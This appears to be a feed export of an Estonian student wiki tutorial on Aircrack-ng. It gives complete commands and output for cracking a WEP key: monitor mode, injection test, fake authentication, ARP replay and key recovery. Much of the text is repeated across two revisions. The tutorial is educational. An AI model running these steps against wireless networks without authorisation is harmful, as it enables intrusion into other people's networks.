Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89299</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89299"/>
		<updated>2015-05-25T19:25:17Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Näide WEP võtme lahti murdmise protsessist */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
